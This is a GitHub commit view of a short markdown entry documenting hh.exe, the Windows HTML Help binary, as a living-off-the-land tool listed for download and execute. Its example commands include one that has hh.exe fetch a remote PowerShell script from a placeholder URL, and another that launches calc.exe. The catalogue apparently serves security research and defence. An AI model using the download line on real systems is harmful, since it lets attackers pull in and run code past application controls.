Update Hh.md

master
Oddvar Moe 2018-05-04 08:04:42 +02:00 committed by GitHub
parent 48057a3987
commit 526db8eddb
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 4 deletions

View File

@ -1,15 +1,15 @@
## hh.exe
* Functions: Open Explorer, Download, Execute
* Functions: Download, Execute
```
HH.exe http://www.google.com
HH.exe C:\
HH.exe C:\
HH.exe c:\windows\system32\calc.exe
HH.exe c:\windows\system32\calc.exe
HH.exe http://some.url/script.ps1
HH.exe http://some.url/script.ps1
```
Acknowledgements: